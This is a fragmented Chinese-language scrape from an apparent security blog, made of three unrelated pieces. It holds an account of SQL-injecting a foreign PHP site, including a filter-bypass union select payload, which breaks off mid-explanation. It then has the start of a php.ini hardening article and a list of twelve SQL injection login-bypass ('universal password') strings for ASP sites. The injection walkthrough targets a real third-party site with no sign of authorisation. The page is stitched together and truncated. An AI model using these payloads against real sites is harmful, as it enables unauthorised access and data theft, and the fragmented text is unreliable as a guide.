叱诧冰子 ′

<br />作者：meao<br /><br />昨天在检测一个外国PHP网站时<br />在id=255后加'出现forbidden<br />于是我and 1=1正常   and 1=2出错<br />说明肯定有注入<br />接着我order by猜出字段<br />然后union select 1,2,3,4 //悲剧的又出现了forbidden<br />肯定是做了过滤了<br />后来构造了语句id=-255+union+/*!select*/+1,2,3,4<br /><br />原理：<br

php.ini安全模式配置详细解释<br /><br />发布:独自等待<br /><br /><br />PHP本身再老版本有一些问题，比如在 php4.3.10和php5.0.3以前有一些比较严重的bug，所以推荐使用新版。另外，目前闹的轰轰烈烈的SQL Injection也是在PHP上有很多利用方式，所以要保证安全，PHP代码编写是一方面，PHP的配置更是非常关键。我们php手手工安装的，php的默认配置文件在 /usr/local/apache2/conf/php.ini，我们最主要就是要配置php

<br />asp aspx万能密码<br /><br />1："or "a"="a<br />2： ')or('a'='a <br />3：or 1=1--<br />4：'or 1=1--<br />5：a'or' 1=1--<br />6："or 1=1--<br />7：'or'a'='a<br />8："or"="a'='a<br />9：'or''='<br />10：'or'='or'<br />11:   1 or '1'='1'=1<br />12:   1 or '1'='1' or 1